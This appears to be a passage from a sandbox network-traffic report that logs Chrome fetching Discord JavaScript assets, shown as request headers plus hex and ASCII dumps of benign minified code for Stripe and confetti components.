                                                                          Data Ascii: toLowerCase(),"AA"!==r&&"AAA"!==r&&(r="AA"),"small"!==e&&"large"!==e&&(e="small"),{level:r,size:e}}(e)).level+n.size){case"AAsmall":case"AAAlarge":a=i>=4.5;break;case"AAlarge":a=i>=3;break;case"AAAsmall":a=i>=7}return a},c.mostReadable=function(t,r,e){var


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          232192.168.2.549966162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC866OUTGET /assets/61160.b9c554bf37895ed48683.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
                                                                          2023-12-10 16:45:09 UTC1118INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 34 63 39 61 38 36 63 38 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:09 GMTContent-Type: application/javascriptContent-Length: 15262Connection: closeCF-Ray: 8336f4e4c9a86c87-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 31 31 36 30 22 5d 2c 7b 34 31 30 39 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 6f 3b 65 3d 6e 2e 6e 6d 64 28 65 29 2c 6e 28 22 38 35 34 35 30 38 22 29 2c 6e 28 22 34 32 34 39 37 33 22 29 2c 6e 28 22 32 32 32 30 30 37 22 29 2c 6e 28 22 37 30 31 30 32 22 29 2c 6e 28 22 38 30 38 36 35 33 22 29 2c 72 3d 74 68 69 73 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["61160"],{41092:function(e,t,n){var r,o;e=n.nmd(e),n("854508"),n("424973"),n("222007"),n("70102"),n("808653"),r=this,o=function(e,t){"use strict";function n(e,t){var n=Object.keys(e);i
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 29 26 26 28 69 2e 70 75 73 68 28 6e 2e 76 61 6c 75 65 29 2c 21 74 7c 7c 69 2e 6c 65 6e 67 74 68 21 3d 3d 74 29 3b 61 3d 21 30 29 3b 7d 63 61 74 63 68 28 65 29 7b 63 3d 21 30 2c 72 3d 65 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 61 26 26 6e 75 6c 6c 21 3d 6f 2e 72 65 74 75 72 6e 26 26 6f 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 63 29 74 68 72 6f 77 20 72 7d 7d 72 65 74 75 72 6e 20 69 7d 7d 28 65 2c 74 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 63 28 65 2c 74 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 69 66
                                                                          Data Ascii: )&&(i.push(n.value),!t||i.length!==t);a=!0);}catch(e){c=!0,r=e}finally{try{!a&&null!=o.return&&o.return()}finally{if(c)throw r}}return i}}(e,t)||function(e,t){if(e){if("string"==typeof e)return c(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);if
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 63 68 65 63 6b 50 72 6f 70 54 79 70 65 73 3a 73 2c 72 65 73 65 74 57 61 72 6e 69 6e 67 43 61 63 68 65 3a 75 7d 3b 72 65 74 75 72 6e 20 6e 2e 50 72 6f 70 54 79 70 65 73 3d 6e 2c 6e 7d 3b 76 61 72 20 70 3d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 6c 28 29 7d 28 66 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 66 2e 65 78 70 6f 72 74 73 29 2c 66 2e 65 78 70 6f 72 74 73 29 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 2e 75 73 65 52 65 66 28 65 29 3b 72 65 74 75 72 6e 20 74 2e 75 73 65 45 66 66 65 63 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 63 75 72 72 65 6e 74 3d 65 7d 2c 5b 65 5d 29 2c 6e 2e 63 75 72 72 65 6e 74 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 65 26 26
                                                                          Data Ascii: checkPropTypes:s,resetWarningCache:u};return n.PropTypes=n,n};var p=(function(e){e.exports=l()}(f={exports:{}},f.exports),f.exports),d=function(e){var n=t.useRef(e);return t.useEffect(function(){n.current=e},[e]),n.current},m=function(e){return null!==e&&
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 6d 2f 64 6f 63 73 2f 73 74 72 69 70 65 2d 6a 73 2f 72 65 61 63 74 23 65 6c 65 6d 65 6e 74 73 2d 70 72 6f 70 73 2d 73 74 72 69 70 65 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 22 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6d 28 74 3d 65 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 74 68 65 6e 29 72 65 74 75 72 6e 7b 74 61 67 3a 22 61 73 79 6e 63 22 2c 73 74 72 69 70 65 50 72 6f 6d 69 73 65 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 65 29 2e 74 68 65 6e 28 67 29 7d 3b 76 61 72 20 74 2c 6e 3d 67 28 65 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 6e 3f 7b 74 61 67 3a 22 65 6d 70 74 79 22 7d 3a 7b 74 61 67 3a 22 73 79 6e 63 22 2c 73 74 72 69 70 65 3a 6e 7d 7d 2c 45 3d 74 2e 63 72 65 61 74 65 43 6f 6e 74 65 78
                                                                          Data Ascii: m/docs/stripe-js/react#elements-props-stripe for details.")},b=function(e){if(m(t=e)&&"function"==typeof t.then)return{tag:"async",stripePromise:Promise.resolve(e).then(g)};var t,n=g(e);return null===n?{tag:"empty"}:{tag:"sync",stripe:n}},E=t.createContex
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 6f 74 20 63 68 61 6e 67 65 20 74 68 65 20 60 73 74 72 69 70 65 60 20 70 72 6f 70 20 61 66 74 65 72 20 73 65 74 74 69 6e 67 20 69 74 2e 22 29 7d 2c 5b 67 2c 6e 5d 29 3b 76 61 72 20 53 3d 64 28 72 29 3b 72 65 74 75 72 6e 20 74 2e 75 73 65 45 66 66 65 63 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 79 2e 65 6c 65 6d 65 6e 74 73 29 7b 76 61 72 20 65 3d 68 28 72 2c 53 2c 5b 22 63 6c 69 65 6e 74 53 65 63 72 65 74 22 2c 22 66 6f 6e 74 73 22 5d 29 3b 65 26 26 79 2e 65 6c 65 6d 65 6e 74 73 2e 75 70 64 61 74 65 28 65 29 7d 7d 2c 5b 72 2c 53 2c 79 2e 65 6c 65 6d 65 6e 74 73 5d 29 2c 74 2e 75 73 65 45 66 66 65 63 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 79 2e 73 74 72 69 70 65 3b 65 26 26 65 2e 5f 72 65 67 69 73 74 65 72 57 72 61 70 70 65 72 26 26
                                                                          Data Ascii: ot change the `stripe` prop after setting it.")},[g,n]);var S=d(r);return t.useEffect(function(){if(y.elements){var e=h(r,S,["clientSecret","fonts"]);e&&y.elements.update(e)}},[r,S,y.elements]),t.useEffect(function(){var e=y.stripe;e&&e._registerWrapper&&
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 20 30 3d 3d 3d 75 3f 7b 7d 3a 75 2c 66 3d 6e 2e 6f 6e 42 6c 75 72 2c 6c 3d 6e 2e 6f 6e 46 6f 63 75 73 2c 70 3d 6e 2e 6f 6e 52 65 61 64 79 2c 6d 3d 6e 2e 6f 6e 43 68 61 6e 67 65 2c 79 3d 6e 2e 6f 6e 45 73 63 61 70 65 2c 76 3d 6e 2e 6f 6e 43 6c 69 63 6b 2c 67 3d 6e 2e 6f 6e 4c 6f 61 64 45 72 72 6f 72 2c 62 3d 6e 2e 6f 6e 4c 6f 61 64 65 72 53 74 61 72 74 2c 45 3d 6e 2e 6f 6e 4e 65 74 77 6f 72 6b 73 43 68 61 6e 67 65 2c 53 3d 6e 2e 6f 6e 43 68 65 63 6b 6f 75 74 2c 43 3d 6e 2e 6f 6e 4c 69 6e 65 49 74 65 6d 43 6c 69 63 6b 2c 6a 3d 6e 2e 6f 6e 43 6f 6e 66 69 72 6d 2c 77 3d 6e 2e 6f 6e 43 61 6e 63 65 6c 2c 78 3d 6e 2e 6f 6e 53 68 69 70 70 69 6e 67 41 64 64 72 65 73 73 43 68 61 6e 67 65 2c 54 3d 6e 2e 6f 6e 53 68 69 70 70 69 6e 67 52 61 74 65 43 68 61 6e 67 65 2c
                                                                          Data Ascii: 0===u?{}:u,f=n.onBlur,l=n.onFocus,p=n.onReady,m=n.onChange,y=n.onEscape,v=n.onClick,g=n.onLoadError,b=n.onLoaderStart,E=n.onNetworksChange,S=n.onCheckout,C=n.onLineItemClick,j=n.onConfirm,w=n.onCancel,x=n.onShippingAddressChange,T=n.onShippingRateChange,
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 70 72 6f 70 54 79 70 65 73 3d 7b 69 64 3a 70 2e 73 74 72 69 6e 67 2c 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 73 74 72 69 6e 67 2c 6f 6e 43 68 61 6e 67 65 3a 70 2e 66 75 6e 63 2c 6f 6e 42 6c 75 72 3a 70 2e 66 75 6e 63 2c 6f 6e 46 6f 63 75 73 3a 70 2e 66 75 6e 63 2c 6f 6e 52 65 61 64 79 3a 70 2e 66 75 6e 63 2c 6f 6e 45 73 63 61 70 65 3a 70 2e 66 75 6e 63 2c 6f 6e 43 6c 69 63 6b 3a 70 2e 66 75 6e 63 2c 6f 6e 4c 6f 61 64 45 72 72 6f 72 3a 70 2e 66 75 6e 63 2c 6f 6e 4c 6f 61 64 65 72 53 74 61 72 74 3a 70 2e 66 75 6e 63 2c 6f 6e 4e 65 74 77 6f 72 6b 73 43 68 61 6e 67 65 3a 70 2e 66 75 6e 63 2c 6f 6e 43 68 65 63 6b 6f 75 74 3a 70 2e 66 75 6e 63 2c 6f 6e 4c 69 6e 65 49 74 65 6d 43 6c 69 63 6b 3a 70 2e 66 75 6e 63 2c 6f 6e 43 6f 6e 66 69 72 6d 3a 70 2e 66 75 6e 63 2c
                                                                          Data Ascii: propTypes={id:p.string,className:p.string,onChange:p.func,onBlur:p.func,onFocus:p.func,onReady:p.func,onEscape:p.func,onClick:p.func,onLoadError:p.func,onLoaderStart:p.func,onNetworksChange:p.func,onCheckout:p.func,onLineItemClick:p.func,onConfirm:p.func,
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 28 22 63 61 6c 6c 73 20 75 73 65 43 61 72 74 45 6c 65 6d 65 6e 74 28 29 22 29 2e 63 61 72 74 7d 2c 65 2e 75 73 65 43 61 72 74 45 6c 65 6d 65 6e 74 53 74 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 28 22 63 61 6c 6c 73 20 75 73 65 43 61 72 74 45 6c 65 6d 65 6e 74 53 74 61 74 65 28 29 22 29 2e 63 61 72 74 53 74 61 74 65 7d 2c 65 2e 75 73 65 45 6c 65 6d 65 6e 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 28 22 63 61 6c 6c 73 20 75 73 65 45 6c 65 6d 65 6e 74 73 28 29 22 29 2e 65 6c 65 6d 65 6e 74 73 7d 2c 65 2e 75 73 65 53 74 72 69 70 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 28 22 63 61 6c 6c 73 20 75 73 65 53 74 72 69 70 65 28 29 22 29 2e 73
                                                                          Data Ascii: nction(){return k("calls useCartElement()").cart},e.useCartElementState=function(){return k("calls useCartElementState()").cartState},e.useElements=function(){return O("calls useElements()").elements},e.useStripe=function(){return O("calls useStripe()").s
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 74 2e 62 6f 64 79 3b 69 66 28 21 72 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 45 78 70 65 63 74 65 64 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 20 6e 6f 74 20 74 6f 20 62 65 20 6e 75 6c 6c 2e 20 53 74 72 69 70 65 2e 6a 73 20 72 65 71 75 69 72 65 73 20 61 20 3c 62 6f 64 79 3e 20 65 6c 65 6d 65 6e 74 2e 22 29 3b 72 65 74 75 72 6e 20 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 2c 6e 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 26 26 65 2e 5f 72 65 67 69 73 74 65 72 57 72 61 70 70 65 72 26 26 65 2e 5f 72 65 67 69 73 74 65 72 57 72 61 70 70 65 72 28 7b 6e 61 6d 65 3a 22 73 74 72 69 70 65 2d 6a 73 22 2c 76 65 72 73 69 6f 6e 3a 22 32 2e 30 2e 30 22 2c 73 74 61 72 74 54 69 6d 65 3a 74 7d 29 7d 2c 6c 3d 6e 75 6c 6c 2c 70 3d 66 75 6e 63 74 69 6f 6e
                                                                          Data Ascii: t.body;if(!r)throw Error("Expected document.body not to be null. Stripe.js requires a <body> element.");return r.appendChild(n),n},f=function(e,t){e&&e._registerWrapper&&e._registerWrapper({name:"stripe-js",version:"2.0.0",startTime:t})},l=null,p=function


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          233192.168.2.549967162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC866OUTGET /assets/22918.9f2b9d54bbfc371a4d92.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
                                                                          2023-12-10 16:45:09 UTC967INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 34 37 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 34 64 38 65 65 35 63 36 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:09 GMTContent-Type: application/javascriptContent-Length: 18475Connection: closeCF-Ray: 8336f4e4d8ee5c6f-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:09 UTC402INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 32 39 31 38 22 5d 2c 7b 35 31 36 35 35 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 43 6f 6e 66 65 74 74 69 43 61 6e 76 61 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 56 7d 2c 45 6e 76 69 72 6f 6e 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 53 70 72 69 74 65 43 61 6e 76 61 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 50 7d 2c 75 73 65 43 6f 6e 66 65 74 74 69 43 61 6e 6e 6f 6e 3a 66 75 6e
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22918"],{516555:function(t,e,n){"use strict";n.r(e),n.d(e,{ConfettiCanvas:function(){return V},Environment:function(){return d},SpriteCanvas:function(){return P},useConfettiCannon:fun
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 6e 20 6e 3e 65 2e 78 26 26 6e 3c 65 2e 78 2b 65 2e 77 69 64 74 68 26 26 69 3e 65 2e 79 26 26 69 3c 65 2e 79 2b 65 2e 68 65 69 67 68 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2a 65 2a 65 2a 28 65 3e 30 3f 2d 31 3a 31 29 7d 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 74 68 69 73 2e 69 64 3d 74 2e 69 64 2c 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 3d 74 2e 70 6f 73 69 74 69 6f 6e 2c 74 68 69 73 2e 76 65 6c 6f 63 69 74 79 3d 74 2e 76 65 6c 6f 63 69 74 79 2c 74 68 69 73 2e 72 6f 74 61 74 69 6f 6e 3d 74 2e 72 6f 74 61 74 69 6f 6e 2c 74 68 69 73 2e 64 72 61 67 43 6f 65 66 66 69 63 69 65 6e 74 3d 74 2e 64 72 61 67 43 6f 65 66 66 69 63 69 65 6e 74 2c 74 68 69 73 2e 73 69 7a 65 3d 74
                                                                          Data Ascii: n n>e.x&&n<e.x+e.width&&i>e.y&&i<e.y+e.height}function l(t,e){return t*e*e*(e>0?-1:1)}var c=function(){function t(t){this.id=t.id,this.position=t.position,this.velocity=t.velocity,this.rotation=t.rotation,this.dragCoefficient=t.dragCoefficient,this.size=t
                                                                          2023-12-10 16:45:09 UTC1246INData Raw: 61 74 65 53 65 6c 66 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2e 78 2a 6e 2e 67 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 2c 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2e 79 2a 6e 2e 67 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 29 2e 72 6f 74 61 74 65 53 65 6c 66 28 74 68 69 73 2e 72 6f 74 61 74 69 6f 6e 2e 78 2c 74 68 69 73 2e 72 6f 74 61 74 69 6f 6e 2e 79 2c 74 68 69 73 2e 72 6f 74 61 74 69 6f 6e 2e 7a 29 29 2c 65 2e 64 72 61 77 49 6d 61 67 65 28 74 2c 74 68 69 73 2e 73 70 72 69 74 65 58 2c 74 68 69 73 2e 73 70 72 69 74 65 59 2c 74 68 69 73 2e 73 70 72 69 74 65 57 69 64 74 68 2c 74 68 69 73 2e 73 70 72 69 74 65 48 65 69 67 68 74 2c 2d 74 68 69 73 2e 77 69 64 74 68 2f 32 2a 6e 2e 67 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 2c 2d
                                                                          Data Ascii: ateSelf(this.position.x*n.g.devicePixelRatio,this.position.y*n.g.devicePixelRatio).rotateSelf(this.rotation.x,this.rotation.y,this.rotation.z)),e.drawImage(t,this.spriteX,this.spriteY,this.spriteWidth,this.spriteHeight,-this.width/2*n.g.devicePixelRatio,-
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 6e 75 6c 6c 21 3d 6e 3f 6e 3a 74 68 69 73 2e 67 72 61 76 69 74 79 2c 74 68 69 73 2e 77 69 6e 64 3d 6e 75 6c 6c 21 3d 69 3f 69 3a 74 68 69 73 2e 77 69 6e 64 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 28 66 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d 7d 29 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 26 26 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 65 7d 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 65 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 6e 29 26 26 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 7d 29 28 74 2c 65
                                                                          Data Ascii: null!=n?n:this.gravity,this.wind=null!=i?i:this.wind},f=function(t,e){return(f=Object.setPrototypeOf||({__proto__:[]})instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(t[n]=e[n])})(t,e
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 65 29 7b 74 2e 70 72 6f 74 6f 74 79 70 65 2e 75 70 64 61 74 65 2e 63 61 6c 6c 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 5f 7a 2e 75 70 64 61 74 65 28 65 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 65 76 69 65 77 55 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 65 76 69 65 77 55 70 64 61 74 65 2e 63 61 6c 6c 28 74 68 69 73 2c 65 29 3b 72 65 74 75 72 6e 20 68 28 68 28 7b 7d 2c 6e 29 2c 7b 7a 3a 74 68 69 73 2e 5f 7a 2e 70 72 65 76 69 65 77 55 70 64 61 74 65 28 65 29 7d 29 7d 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 7a 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 7a 2e 76
                                                                          Data Ascii: e){t.prototype.update.call(this,e),this._z.update(e)},e.prototype.previewUpdate=function(e){var n=t.prototype.previewUpdate.call(this,e);return h(h({},n),{z:this._z.previewUpdate(e)})},Object.defineProperty(e.prototype,"z",{get:function(){return this._z.v
                                                                          2023-12-10 16:45:09 UTC1369INData Raw: 2e 64 69 72 65 63 74 69 6f 6e 4d 75 6c 74 69 70 6c 69 65 72 3a 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 4d 75 6c 74 69 70 6c 69 65 72 2c 61 3d 74 68 69 73 2e 65 61 73 69 6e 67 46 75 6e 63 74 69 6f 6e 28 69 2c 74 68 69 73 2e 6d 69 6e 2c 65 2c 74 68 69 73 2e 64 75 72 61 74 69 6f 6e 29 3b 72 65 74 75 72 6e 5b 69 73 4e 61 4e 28 61 29 3f 30 3a 61 2c 69 2c 72 5d 7d 2c 65 7d 28 76 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 3d 3d 3d 65 3f 74 3a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 65 2d 74 2b 31 29 2b 74 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 29 7b 76 61 72 20 65 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 62 28 30 2c 74 2e 6c 65 6e 67 74 68 2d 31 29 29 3b 72 65 74 75 72 6e 5b 74 5b 65 5d 2c 65 5d 7d 66 75 6e 63 74 69 6f 6e 20
                                                                          Data Ascii: .directionMultiplier:this.directionMultiplier,a=this.easingFunction(i,this.min,e,this.duration);return[isNaN(a)?0:a,i,r]},e}(v);function b(t,e){return t===e?t:Math.random()*(e-t+1)+t}function C(t){var e=Math.floor(b(0,t.length-1));return[t[e],e]}function
